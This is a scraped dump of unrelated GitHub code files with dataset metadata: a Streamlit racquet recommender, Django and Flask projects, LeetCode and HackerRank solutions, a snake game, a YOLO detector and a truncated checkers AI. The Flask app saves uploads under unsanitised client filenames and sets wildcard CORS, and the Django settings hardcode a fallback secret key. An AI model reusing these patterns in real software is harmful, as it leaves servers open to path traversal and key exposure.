4.0\n}\n\nstroke_style_mapping = {\n 'Compact': 1.0,\n 'Compact-Medium': 2.0,\n 'Medium': 3.0,\n 'Medium-Full': 4.0,\n 'Full': 5.0\n}\n\npower_level_mapping = {\n 'Low': 1.0,\n 'Low-Medium': 2.0,\n 'Medium': 3.0,\n 'Medium-High': 4.0,\n 'High': 5.0\n}\n\n# Read data\ndf = pd.read_csv('selected.csv')\n\n# Define composition_mapping\ncomposition_mapping = {category: i for i, category in enumerate(df['Composition:'].unique())}\n\n# Display title\nst.title('Tennis Racquet Recommendation System')\n\n# Get user input\nnumeric_columns = [\"Head Size:\", \"Length:\", \"Strung Weight:\", \"Swingweight:\", \"Stiffness:\", \"Price\"]\nfor col in numeric_columns:\n df[col] = pd.to_numeric(df[col], errors='coerce')\n\nhead_size = st.slider(\"Head Size (cm):\", float(df[\"Head Size:\"].min()), float(df[\"Head Size:\"].max()))\nlength = st.slider(\"Length (cm):\", float(df[\"Length:\"].min()), float(df[\"Length:\"].max()))\nstrung_weight = st.slider(\"Strung Weight (g):\", float(df[\"Strung Weight:\"].min()), float(df[\"Strung Weight:\"].max()))\nswingweight = st.slider(\"Swingweight:\", float(df[\"Swingweight:\"].min()), 
float(df[\"Swingweight:\"].max()))\nstiffness = st.slider(\"Stiffness:\", float(df[\"Stiffness:\"].min()), float(df[\"Stiffness:\"].max()))\nprice = st.slider(\"Price ($):\", float(df[\"Price\"].min()), float(df[\"Price\"].max()))\nracquet_type = st.selectbox('Racquet Type', list(racquet_type_mapping.keys()))\ncomposition = st.selectbox('Composition:', list(df['Composition:'].unique()))\npower_level = st.selectbox('Power Level:', list(power_level_mapping.keys()))\nstroke_style = st.selectbox('Stroke Style:', list(stroke_style_mapping.keys()))\n\n# Get user input\n# ... (your existing code to get user input)\n\n# Add button\nif st.button('Get Recommendations'):\n user_preferences = {\n \"Head Size:\": head_size, \n \"Length:\": length, \n \"Strung Weight:\": strung_weight, \n \"Swingweight:\": swingweight, \n \"Stiffness:\": stiffness, \n \"Price\": price, \n \"Racquet Type\": racquet_type_mapping[racquet_type],\n \"Composition:\": composition_mapping[composition], \n \"Power Level:\": power_level_mapping[power_level], \n \"Stroke Style:\": stroke_style_mapping[stroke_style]\n }\n\n # Get recommendations\n recommended_racquets = recommend_racquets(user_preferences, df)\n\n # Display recommendations\n st.header('Recommended Racquets:')\n st.table(recommended_racquets)\n","repo_name":"Mawuli-Akpey/Racquet-Recommender","sub_path":"racquet.py","file_name":"racquet.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10006731712","text":"#!/bin/python3\n\ni = list(range(1, 11))\n\n\nif __name__ == '__main__':\n n = int(input())\n\n\nfor l in i:\n print(str(n) +' x '+ str(i[l -1]) + ' = ' + str(n*i[l-1]))\n","repo_name":"arwildo/hacker-rank","sub_path":"30DaysOfCode/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71328267074","text":"# -*- coding: utf-8 -*-\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\nAPI_KEY = os.getenv(\"API_KEY\", None)\nFCM_KEY = os.getenv(\"FCM_KEY\", None)\nFIREBASE_PROJECT_ID = os.getenv(\"FCM_ID\", None)\nDATABASE_CONFIG = os.getenv(\"DATABASE_CONFIG\", None)\nDATABASE_CONFIG_LOCAL = os.getenv(\"DATABASE_CONFIG_LOCAL\", None)\nFIREBASE_UID = os.getenv(\"FIREBASE_UID\", None)\nFIREBASE_NAME = os.getenv(\"FIREBASE_NAME\", None)\nFIREBASE_EMAIL = os.getenv(\"FIREBASE_EMAIL\", None)","repo_name":"Flaviommrs/MC855-Unimapa","sub_path":"backend/src/config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36573693513","text":"import bpy\n\n\nkeymap = None\n\n\ndef register(keyconfig: bpy.types.KeyConfig):\n global keymap\n\n if keymap is None:\n keymap = keyconfig.keymaps.new(name=\"3D View\", space_type=\"VIEW_3D\")\n\n item = keymap.keymap_items.new('wm.call_menu_pie', 'Z', 'PRESS')\n item.properties.name = 'ALTPIES_MT_ShadingPie'\n\n item = keymap.keymap_items.new('wm.call_menu_pie', 'ACCENT_GRAVE', 'PRESS')\n item.properties.name = 'ALTPIES_MT_ViewPie'\n\n\ndef unregister(keyconfig: bpy.types.KeyConfig):\n global keymap\n\n if keymap is not None:\n keyconfig.keymaps.remove(keymap)\n\n keymap = 
None\n","repo_name":"bonjorno7/AlternativePies","sub_path":"addon/keymaps/view_3d.py","file_name":"view_3d.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12986084129","text":"\"\"\"\nLocal settings for arcadia website project.\n\n- Run in Debug mode\n\n- Use mailhog for emails via Docker\n\n- Add Django Debug Toolbar\n- Add django-extensions as app\n\"\"\"\n\nfrom .base import * # noqa\n\n# DEBUG\n# ------------------------------------------------------------------------------\nDEBUG = env.bool('DJANGO_DEBUG', default=True)\nTEMPLATES[0]['OPTIONS']['debug'] = DEBUG\n\n# SECRET CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\n# Note: This key only used for development and testing.\nSECRET_KEY = env('DJANGO_SECRET_KEY', default='d)^%-H!-TBj$cBY/[J7^kd?Z!?B15$p5kw@B+jWcMa.({qHSXV')\n\n# Mail settings\n# ------------------------------------------------------------------------------\n\nEMAIL_PORT = 1025\n\nEMAIL_HOST = env('EMAIL_HOST', default='mailhog')\n\n\n# ALLOWED HOSTS\nALLOWED_HOSTS = env.list('DJANGO_ALLOWED_HOSTS', default=['192.168.99.100', ])\nprint(\"ALLOWED_HOSTS: \", ALLOWED_HOSTS)\n\n# CACHING\n# ------------------------------------------------------------------------------\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'LOCATION': ''\n }\n}\n\n# django-debug-toolbar\n# ------------------------------------------------------------------------------\nMIDDLEWARE += ['debug_toolbar.middleware.DebugToolbarMiddleware', ]\nINSTALLED_APPS += ['debug_toolbar', ]\n\nINTERNAL_IPS = ['127.0.0.1', '10.0.2.2', ]\n\n\nimport socket\nimport os\n# tricks to have debug toolbar when developing with docker\n# if os.environ.get('USE_DOCKER') == 'yes':\n# ip = socket.gethostbyname(socket.gethostname())\n# INTERNAL_IPS += [ip[:-1] + '1']\n\nhostname, _, ips = socket.gethostbyname_ex(socket.gethostname())\nINTERNAL_IPS += [ip[:-1] + '1' for ip in ips]\n\nDEBUG_TOOLBAR_CONFIG = {\n 'DISABLE_PANELS': [\n 'debug_toolbar.panels.redirects.RedirectsPanel',\n ],\n 'SHOW_TEMPLATE_CONTEXT': True,\n}\n\n# django-extensions\n# ------------------------------------------------------------------------------\nINSTALLED_APPS += ['django_extensions', ]\n\n# TESTING\n# ------------------------------------------------------------------------------\nTEST_RUNNER = 'django.test.runner.DiscoverRunner'\n\n# Custom Admin URL, use {% url 'admin:index' %}\nADMIN_URL = env('DJANGO_ADMIN_URL')\n\n# Your local stuff: Below this line define 3rd party library settings\n# ------------------------------------------------------------------------------\n","repo_name":"ArcadiaLandTrust/arcadia_website","sub_path":"config/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26664250054","text":"\n\nfrom flask import Flask, render_template, request\nfrom werkzeug import secure_filename\nimport os, json#, boto3\nimport subprocess\nimport pandas as pd\nfrom datetime import date\nimport csv\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER']='filein/'\napp = Flask(__name__, static_url_path = \"/assets\", static_folder = \"output\")\n\n@app.route('/brain_beats_virus')\ndef upload_file():\n return render_template('richtext.html')\n 
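\n# --- illustrative sketch (editor addition, not part of the original app) ---\n# The upload handlers in this module save request.files['file'] under its raw,\n# client-supplied filename, which allows path traversal (a name such as ../app.py\n# escapes the upload folder). werkzeug's secure_filename -- imported above but\n# never used -- is the usual guard. A minimal safe-save helper could look like\n# this; the helper name save_upload is hypothetical:\ndef save_upload(file_storage, upload_dir='filein/'):\n    # sanitize the client-supplied name before touching the filesystem\n    safe_name = secure_filename(file_storage.filename)\n    dest = os.path.join(upload_dir, safe_name)\n    file_storage.save(dest)\n    return dest\n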
\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Headers', 'Content-Type, Authorization')\n response.headers.add('Access-Control-Allow-Methods', 'GET, POST, PATCH, DELETE, OPTIONS')\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n\n@app.route('/uploader', methods = ['GET', 'POST'])\ndef uploader_file():\n if request.method == 'POST':\n #print(\"Before bucket\")\n #S3_BUCKET = os.environ.get('S3_BUCKET')\n #print(\"Entering uploader\")\n f = request.files['file']\n f.save('filein/'+f.filename)\n print(\"request files caught\")\n #f = request.form\n #for key in f.keys():\n # for value in f.getlist(key):\n # print(key,\":\",value)\n text1 = request.form['lagebeurteilung']\n text2 = request.form['value_infectious']\n text3 = request.form['viral']\n text4 = request.form['dunkelziffer']\n text5 = request.form['viruskontakt']\n print(\"Got all the forms\")\n with open(os.path.join(\"app/output/\", \"text1.txt\"), \"w\") as text_file:\n text_file.write(text1)\n with open(os.path.join(\"app/output/\", \"text2.txt\"), \"w\") as text_file:\n text_file.write(text2)\n with open(os.path.join(\"app/output/\", \"text3.txt\"), \"w\") as text_file:\n text_file.write(text3)\n with open(os.path.join(\"app/output/\", \"text4.txt\"), \"w\") as text_file:\n text_file.write(text4)\n with open(os.path.join(\"app/output/\", \"text5.txt\"), \"w\") as text_file:\n text_file.write(text5)\n #subprocess.call(\"Rscript ./easy_way.R\", shell=True)\n #s3 = boto3.resource('s3')\n #s3.Bucket(S3_BUCKET).upload_file('app/output/data.csv','data.csv',ExtraArgs={'ACL':'public-read'})\n #s3.Bucket(S3_BUCKET).upload_file('app/output/lastupdate.csv','lastupdate.csv',ExtraArgs={'ACL':'public-read'})\n #s3.Bucket(S3_BUCKET).upload_file('app/output/text1.txt','text1.txt',ExtraArgs={'ACL':'public-read'})\n #s3.Bucket(S3_BUCKET).upload_file('app/output/text2.txt','text2.txt',ExtraArgs={'ACL':'public-read'})\n #s3.Bucket(S3_BUCKET).upload_file('app/output/text3.txt','text3.txt',ExtraArgs={'ACL':'public-read'})\n #s3.Bucket(S3_BUCKET).upload_file('app/output/text4.txt','text4.txt',ExtraArgs={'ACL':'public-read'})\n #s3.Bucket(S3_BUCKET).upload_file('app/output/text5.txt','text5.txt',ExtraArgs={'ACL':'public-read'})\n run_script()\n\n\n\n return 'Datei wurde erfolgreich gesendet.'\n\nif __name__ == '__main__':\n app.run(debug = True)\n \ndef run_script():\n print(\"normal\")\n chbase5 = pd.read_excel (\"filein/Corona_Virus_2020_actual.xlsx\",engine=\"openpyxl\",sheet_name=\"CH base Impf\",skiprows=45,usecols=[0,21,22,24,26,45,49,51,86,88])\n\n new_cols=[\"Datum\",\"Viral_Pot\",\"Dunkelziffer\",\"V24\",\"Value_Infectious\",\"V45\",\"Free_Viral\",\"Geimpfte\",\"Viralität_in_Proz\",\"Viralität_pro_X\"]\n new_names_map = {chbase5.columns[i]:new_cols[i] for i in range(len(new_cols))}\n chbase5.rename(new_names_map, axis=1, inplace=True)\n\n chbase5.Viralität_pro_X=chbase5.Viralität_pro_X/25\n chbase5.Viralität_in_Proz=chbase5.Viralität_in_Proz*100\n chbase5['Menschen_mit_Viruskontakt']=chbase5.V45*chbase5.V24*100\n\n chbase5.Geimpfte=chbase5.Geimpfte.fillna(0)\n\n print(chbase5.size)\n chbase5.dropna(subset=['Datum'],inplace=True)\n chbase5.dropna(subset=['Viral_Pot'],inplace=True)\n print(chbase5.size)\n\n chbase5=chbase5[[\"Datum\",\"Viral_Pot\",\"Value_Infectious\",\"Free_Viral\",\"Viralität_in_Proz\",\"Viralität_pro_X\",\"Dunkelziffer\",\"Menschen_mit_Viruskontakt\",\"Geimpfte\"]]\n\n\n print(\"Plus\")\n chbaseplus5 = pd.read_excel 
(\"filein/Corona_Virus_2020_actual.xlsx\",engine=\"openpyxl\",sheet_name=\"CH base+ Impf\",skiprows=45,usecols=[0,21,22,24,26,45,49,51,86,88])\n\n new_cols=[\"Datum\",\"Viral_Pot_Plus\",\"Dunkelziffer_Plus\",\"V24\",\"Value_Infectious_Plus\",\"V45\",\"Free_Viral_Plus\",\"Geimpfte_Plus\",\"Viralität_in_Proz_Plus\",\"Viralität_pro_X_Plus\"]\n new_names_map = {chbaseplus5.columns[i]:new_cols[i] for i in range(len(new_cols))}\n chbaseplus5.rename(new_names_map, axis=1, inplace=True)\n\n chbaseplus5.Viralität_pro_X_Plus=chbaseplus5.Viralität_pro_X_Plus/25\n chbaseplus5.Viralität_in_Proz_Plus=chbaseplus5.Viralität_in_Proz_Plus*100\n chbaseplus5['Menschen_mit_Viruskontakt_Plus']=chbaseplus5.V45*chbaseplus5.V24*100\n\n chbaseplus5.Geimpfte_Plus=chbaseplus5.Geimpfte_Plus.fillna(0)\n\n print(chbaseplus5.size)\n chbaseplus5.dropna(subset=['Datum'],inplace=True)\n chbaseplus5.dropna(subset=['Viral_Pot_Plus'],inplace=True)\n print(chbaseplus5.size)\n\n chbaseplus5=chbaseplus5[[\"Datum\",\"Viral_Pot_Plus\",\"Value_Infectious_Plus\",\"Free_Viral_Plus\",\"Viralität_in_Proz_Plus\",\"Viralität_pro_X_Plus\",\"Dunkelziffer_Plus\",\"Menschen_mit_Viruskontakt_Plus\",\"Geimpfte_Plus\"]]\n\n\n print(\"Opt\")\n chbaseopt5 = pd.read_excel (\"filein/Corona_Virus_2020_actual.xlsx\",engine=\"openpyxl\",sheet_name=\"CH opt Impf \",skiprows=45,usecols=[0,21,22,24,26,45,49,51,86,88])\n\n new_cols=[\"Datum\",\"Viral_Pot_Opt\",\"Dunkelziffer_Opt\",\"V24\",\"Value_Infectious_Opt\",\"V45\",\"Free_Viral_Opt\",\"Geimpfte_Opt\",\"Viralität_in_Proz_Opt\",\"Viralität_pro_X_Opt\"]\n new_names_map = {chbaseopt5.columns[i]:new_cols[i] for i in range(len(new_cols))}\n chbaseopt5.rename(new_names_map, axis=1, inplace=True)\n\n chbaseopt5.Viralität_pro_X_Opt=chbaseopt5.Viralität_pro_X_Opt/25\n chbaseopt5.Viralität_in_Proz_Opt=chbaseopt5.Viralität_in_Proz_Opt*100\n chbaseopt5['Menschen_mit_Viruskontakt_Opt']=chbaseopt5.V45*chbaseopt5.V24*100\n\n chbaseopt5.Geimpfte_Opt=chbaseopt5.Geimpfte_Opt.fillna(0)\n\n print(chbaseopt5.size)\n chbaseopt5.dropna(subset=['Datum'],inplace=True)\n chbaseopt5.dropna(subset=['Viral_Pot_Opt'],inplace=True)\n print(chbaseopt5.size)\n\n chbaseopt5=chbaseopt5[[\"Datum\",\"Viral_Pot_Opt\",\"Value_Infectious_Opt\",\"Free_Viral_Opt\",\"Viralität_in_Proz_Opt\",\"Viralität_pro_X_Opt\",\"Dunkelziffer_Opt\",\"Menschen_mit_Viruskontakt_Opt\",\"Geimpfte_Opt\"]]\n\n print(\"Pess\")\n chbasepess5 = pd.read_excel (\"filein/Corona_Virus_2020_actual.xlsx\",engine=\"openpyxl\",sheet_name=\"CH pess Impf\",skiprows=45,usecols=[0,21,22,24,26,45,49,51,86,88])\n\n new_cols=[\"Datum\",\"Viral_Pot_Pess\",\"Dunkelziffer_Pess\",\"V24\",\"Value_Infectious_Pess\",\"V45\",\"Free_Viral_Pess\",\"Geimpfte_Pess\",\"Viralität_in_Proz_Pess\",\"Viralität_pro_X_Pess\"]\n new_names_map = {chbasepess5.columns[i]:new_cols[i] for i in range(len(new_cols))}\n chbasepess5.rename(new_names_map, axis=1, inplace=True)\n\n chbasepess5.Viralität_pro_X_Pess=chbasepess5.Viralität_pro_X_Pess/25\n chbasepess5.Viralität_in_Proz_Pess=chbasepess5.Viralität_in_Proz_Pess*100\n chbasepess5['Menschen_mit_Viruskontakt_Pess']=chbasepess5.V45*chbasepess5.V24*100\n\n chbasepess5.Geimpfte_Pess=chbasepess5.Geimpfte_Pess.fillna(0)\n\n print(chbasepess5.size)\n chbasepess5.dropna(subset=['Datum'],inplace=True)\n chbasepess5.dropna(subset=['Viral_Pot_Pess'],inplace=True)\n print(chbasepess5.size)\n\n 
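# --- illustrative sketch (editor addition, not in the original) ---\n    # The base/plus/opt/pess blocks in run_script repeat the same\n    # read/rename/derive/dropna steps and differ only in the sheet name and\n    # column suffix. A parameterised loader -- the name load_sheet is\n    # hypothetical -- could collapse each block to one call plus the shared\n    # post-processing:\n    def load_sheet(sheet_name, suffix=''):\n        df = pd.read_excel('filein/Corona_Virus_2020_actual.xlsx', engine='openpyxl', sheet_name=sheet_name, skiprows=45, usecols=[0, 21, 22, 24, 26, 45, 49, 51, 86, 88])\n        base_cols = ['Datum', 'Viral_Pot', 'Dunkelziffer', 'V24', 'Value_Infectious', 'V45', 'Free_Viral', 'Geimpfte', 'Viralität_in_Proz', 'Viralität_pro_X']\n        # suffix the scenario-specific columns; Datum and the helper columns stay shared\n        df.columns = [c if c in ('Datum', 'V24', 'V45') else c + suffix for c in base_cols]\n        return df\n    # e.g. load_sheet('CH pess Impf', '_Pess') would stand in for the pess block\n    # below, with the scaling and dropna steps applied once afterwards.\n    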
chbasepess5=chbasepess5[[\"Datum\",\"Viral_Pot_Pess\",\"Value_Infectious_Pess\",\"Free_Viral_Pess\",\"Viralität_in_Proz_Pess\",\"Viralität_pro_X_Pess\",\"Dunkelziffer_Pess\",\"Menschen_mit_Viruskontakt_Pess\",\"Geimpfte_Pess\"]]\n\n merged = pd.merge(chbase5,chbaseplus5, on=\"Datum\")\n merged2 = pd.merge(chbaseopt5,chbasepess5, on=\"Datum\")\n merged3 = pd.merge(merged,merged2, on=\"Datum\")\n\n print(merged3.Dunkelziffer)\n print(merged3.Value_Infectious)\n\n #pd.set_option('float_format', lambda x: '%.10f' % x)\n #pd.set_option('display.float_format', lambda x: '%.10f' % x)\n merged3.to_csv(\"app/output/data.csv\",index=False)#, float_format='%.20f')#,quoting=csv.QUOTE_MINIMAL)\n\n print(merged3)\n print(merged3.Value_Infectious.dtypes)\n\n f = open(\"app/output/lastupdate.csv\", \"w\")\n date_string=date.today().strftime(\"%Y-%m-%d\")\n f.write(\"lastupdate\\n\"+date_string)\n f.close()","repo_name":"smartrestart/smartrestart_glitch_letterbox","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26543181100","text":"import torch\n\n\nclass Detector:\n def __init__(self, net_path):\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n self.net = torch.load(net_path, map_location=self.device.type)\n self.net.eval()\n\n def detect(self, x_in, thresh, anchors):\n out13, out26 = self.net(x_in.to(self.device))\n\n # keep boxes over thresh\n idxs26, vectors26 = self.boxFilter(out26, thresh)\n idxs13, vectors13 = self.boxFilter(out13, thresh)\n\n # calculate the real position\n boxes26 = self.boxReturn(idxs26, vectors26, 16, anchors[26]).to(self.device)\n boxes13 = self.boxReturn(idxs13, vectors13, 32, anchors[13]).to(self.device)\n\n return torch.cat([boxes26, boxes13], dim=0)\n\n def boxFilter(self, output, thresh):\n output = output.permute(0, 2, 3, 1)\n output = output.reshape(output.size()[0], output.size()[1],\n output.size()[2], 3, -1) # N, H, W, 3, 5 (iou, cx, cy, w, h, cls)\n\n mask = output[..., 0] > thresh\n idxs = mask.nonzero()\n vectors = output[mask]\n return idxs, vectors\n\n def boxReturn(self, idxs, vectors, scaleRate, anchors):\n if vectors.size()[0] == 0:\n return torch.tensor([])\n\n # vectors [iou, cx_offset, cy_offset, w_offset, h_offset]\n anchors = torch.tensor(anchors, dtype=torch.float32).to(self.device)\n batch, idx_cy, idx_cx, boxType = idxs[:, 0], idxs[:, 1], idxs[:, 2], idxs[:, 3] # [N, H, W, 3(Box Type), 10]\n cx, cy = (idx_cx.float() + vectors[:, 1]) * scaleRate, (idx_cy.float() + vectors[:, 2]) * scaleRate\n w, h = anchors[boxType, 0] * torch.exp(vectors[:, 3]), anchors[boxType, 1] * torch.exp(vectors[:, 4])\n confi = vectors[..., 0]\n cls = vectors[..., 5:].T\n try:\n return torch.stack([batch.float(), confi, cx, cy, w, h, *cls], dim=1)\n except Exception:\n return torch.stack([batch.float(), confi, cx, cy, w, h], dim=1)\n","repo_name":"EinKung/YoloTiny","sub_path":"yolo_tiny/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17225876521","text":"# You are given an array of points in the X-Y plane points where points[i] = [xi, yi].\n\n# Return the minimum area of a rectangle formed from these points, with sides parallel to the X and Y axes. 
If there is not any such rectangle, return 0.\n\n# Example 1:\n\n# Input: points = [[1,1],[1,3],[3,1],[3,3],[2,2]]\n# Output: 4\n# Example 2:\n\n# Input: points = [[1,1],[1,3],[3,1],[3,3],[4,1],[4,3]]\n# Output: 2\n\nclass Solution:\n def minAreaRect(self, points: List[List[int]]) -> int:\n n = len(points)\n points.sort(key=lambda x: (x[0], x[1]))\n # sorted(word_dict.items(), key=lambda x: (-x[1], x[0]))\n possible_areas = []\n for p1 in range(n):\n for p2 in range(p1 + 1, n):\n for p3 in range(p2 + 1, n):\n for p4 in range(p3 + 1, n):\n point1 = points[p1]\n point2 = points[p2]\n point3 = points[p3]\n point4 = points[p4]\n if point1[0] == point2[0] and point1[1] == point3[1] and point3[0] == point4[0] and point2[1] == point4[1]:\n if (point1,point2,point3,point4) not in possible_areas:\n possible_areas.append((point1,point2,point3,point4))\n \n result = float('inf')\n for item in possible_areas:\n area = abs(item[0][0] - item[2][0]) * abs(item[0][1] - item[1][1])\n if area < result:\n result = area\n if result == float('inf'):\n result = 0\n return result\n\n def minAreaRectLeetCode(self, points):\n seen = set()\n res = float('inf')\n for x1, y1 in points:\n for x2, y2 in seen:\n if (x1, y2) in seen and (x2, y1) in seen:\n area = abs(x1 - x2) * abs(y1 - y2)\n if area and area < res:\n res = area\n seen.add((x1, y1))\n return res if res < float('inf') else 0","repo_name":"angelricardoh/LeetCode-Python","sub_path":"Others/Minimum Area Rectangle.py","file_name":"Minimum Area Rectangle.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26716949846","text":"from turtle import Turtle\n\nUP = 90\nDOWN = 270\nRIGHT = 0\nLEFT = 180\n\n\nclass Snake(Turtle):\n\n def __init__(self):\n super().__init__(visible=False)\n self.color(\"white\")\n self.penup()\n self.segments = []\n self.create_snake()\n self.head = self.segments[0]\n\n def create_snake(self):\n x = 0\n for i in range(3):\n square = Turtle(\"square\")\n square.color(\"white\")\n square.penup()\n square.speed(\"fastest\")\n square.goto(x, 0)\n x -= 20\n self.segments.append(square)\n\n def move(self):\n for seg_num in range(len(self.segments) - 1, 0, -1):\n new_x = self.segments[seg_num - 1].xcor()\n new_y = self.segments[seg_num - 1].ycor()\n self.segments[seg_num].goto(new_x, new_y)\n self.head.forward(21)\n\n def add_piece(self):\n square = Turtle(\"square\")\n square.color(\"white\")\n square.penup()\n i = len(self.segments)\n last_segment = self.segments[i - 1]\n x = last_segment.xcor()\n y = last_segment.ycor()\n heading = last_segment.heading()\n square.goto(x, y)\n square.setheading(heading)\n self.segments.append(square)\n\n def up(self):\n if self.head.heading() != DOWN:\n self.head.setheading(UP)\n\n def down(self):\n if self.head.heading() != UP:\n self.head.setheading(DOWN)\n\n def mv_left(self):\n if self.head.heading() != RIGHT:\n self.head.setheading(LEFT)\n\n def mv_right(self):\n if self.head.heading() != LEFT:\n self.head.setheading(RIGHT)\n\n def reset(self):\n for seg in self.segments:\n seg.hideturtle()\n self.segments.clear()\n self.create_snake()\n self.head = self.segments[0]\n\n def wall_collision(self, screen):\n if self.head.xcor() >= screen.window_width() / 2 or self.head.xcor() <= -screen.window_width() / 2:\n return True\n elif self.head.ycor() >= screen.window_height() / 2 or self.head.ycor() <= -screen.window_height() / 2:\n return True\n else:\n return False\n\n def snake_collision(self):\n for seg_num 
in range(len(self.segments) - 1, 0, -1):\n if self.segments[0].position() == self.segments[seg_num].position():\n return True\n return False\n","repo_name":"Wojtke7/100-Days-of-code-Python","sub_path":"Day 20, 21 snake game/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10207362676","text":"import json\r\nimport logging\r\nimport base64\r\nfrom handler import Handler\r\n\r\n'''\r\n------ PROTOCOL FORMAT ------\r\nString terbagi menjadi 2 bagian yang dipisahkan oleh spasi\r\n------ FITUR ------\r\n1. Mengunggah File (Upload)\r\n Untuk mengunggah/upload file ke folder 'dir'\r\n Request : upload\r\n Parameter : upload namafile\r\n Respon : jika berhasil, maka akan mengeluarkan tulisan namafile Successfully uploaded\r\n jika gagal, mengeluarkan tulisan Error\r\n2. Mengunduh File (Download)\r\n Untuk mengunduh/download file dari dalam folder 'dir'\r\n Request : download\r\n Parameter: namafile yg ingin di download dari folder dir\r\n Response: file yang terdownload akan muncul di direktori script berada\r\n3. Melihat Isi File (List File)\r\n Untuk melihat list file yang berada dalam folder 'dir'\r\n Request : list\r\n Parameter : -\r\n Response: menampilkan nama-nama file dalam folder 'dir'\r\nJika command tidak dikenali akan merespon dengan ERRCMD\r\n'''\r\n\r\np = Handler()\r\n\r\nclass FileMachine:\r\n def proses(self,string_to_process):\r\n s = string_to_process\r\n cstring = s.split(\" \")\r\n try:\r\n command = cstring[0].strip()\r\n if (command=='upload'):\r\n logging.warning(\"upload\")\r\n source = cstring[1].strip()\r\n dest = cstring[2].strip()\r\n p.upload_file(source,dest.encode())\r\n return \"Ok, File Uploaded\"\r\n\r\n elif (command=='download'):\r\n logging.warning(\"download\")\r\n source = cstring[1].strip()\r\n res = p.download_file(source)\r\n return res[0]\r\n\r\n elif (command=='list'):\r\n logging.warning(\"list\")\r\n res = p.list_file()\r\n dict = {\"status\":\"success\",\"data\": res}\r\n return json.dumps(dict)\r\n else:\r\n return \"ERRCMD\"\r\n\r\n except:\r\n return \"ERROR\"\r\n\r\nif __name__=='__main__':\r\n pm = FileMachine()\r\n run = pm.proses(\"list\")\r\n print(run)","repo_name":"tbirkham/progjar-b-its-2020","sub_path":"Tugas 4/file_machine.py","file_name":"file_machine.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18150994547","text":"import sys\nsys.stdin = open('input.txt', \"r\")\n\nN = int(sys.stdin.readline().rstrip())\n\n\n# 먼져 방향 그래프를 이어준다 (트리)\ndirect = [[]for _ in range(N+1)]\nfor _ in range(N-1):\n A, B = map(int, sys.stdin.readline().rstrip().split(' '))\n direct[A].append(B)\n direct[B].append(A)\n\n\nDP = [[0, 0] for _ in range(N+1)] # 켜졌을경우, 꺼졌을경우\n# 켜졌을경우 하위노드들의 최솟값을 가져온다.\n# 꺼졌을경우 하위노드들이 켜졌을 경우를 가져온다.\ncheck = [False]*(N+1)\n# 정점 아무거나 하나를 선택한뒤 내려간다.\n\n\ndef DFS(now):\n check[now] = True\n DP[now][0] = 1\n for next in direct[now]:\n if check[next] == True:\n continue\n # 켜졌을경우\n DFS(next)\n DP[now][0] += min(DP[next])\n # 꺼졌을경우\n DP[now][1] += DP[next][0]\n\n\nDFS(1)\nprint(min(DP[1]))\n","repo_name":"aver1001/Problem-Solving","sub_path":"풀이 완료/2533/acmicpc.py","file_name":"acmicpc.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33949197637","text":"from random import randint\nfrom 
BoardClasses import Move\nfrom BoardClasses import Board\nfrom collections import defaultdict\n#The following part should be completed by students.\n#Students can modify anything except the class name and exisiting functions and varibles.\n\nclass Node():\n def __init__(self, color: int, move: Move =None):\n self.color: int = color\n self.move: Move = move\n self.priorityScore: int = 0\n self.children: [Node] = []\n\n\n\n\n# def color(color):\n# return\n\n\nclass StudentAI():\n\n def __init__(self,col,row,p):\n self.col = col\n self.row = row\n self.p = p\n self.board = Board(col,row,p)\n self.board.initialize_game()\n self.color = ''\n self.opponent = {1:2,2:1}\n self.color = 2\n\n\n\n def get_move(self,move):\n \"\"\"\n receiving the opponent move and producing the move.\n just one simple move\n \"\"\"\n if len(move) != 0:\n self.board.make_move(move,self.opponent[self.color])\n else:\n self.color = 1\n\n # produce a random move\n \"\"\"\n moves = self.board.get_all_possible_moves(self.color)\n index = randint(0,len(moves)-1)\n inner_index = randint(0,len(moves[index])-1)\n move = moves[index][inner_index]\n self.board.make_move(move,self.color)\n \"\"\"\n #moves = self.board.get_all_possible_moves(self.color) # list of Move objects\n move = self.minmaxSearch()\n self.board.make_move(move,self.color)\n return move\n\n\n # evaluate the state in my position\n def evaluate_score(self, myTurn: bool = True):\n point = 0\n for i in range(self.row):\n for j in range(self.col):\n checker = self.board.board[i][j]\n if checker.color == 'W':\n point -= 1\n if checker.is_king:\n point -= 1\n elif checker.color == 'B':\n point += 1\n if checker.is_king:\n point += 1\n\n\n if myTurn:\n return 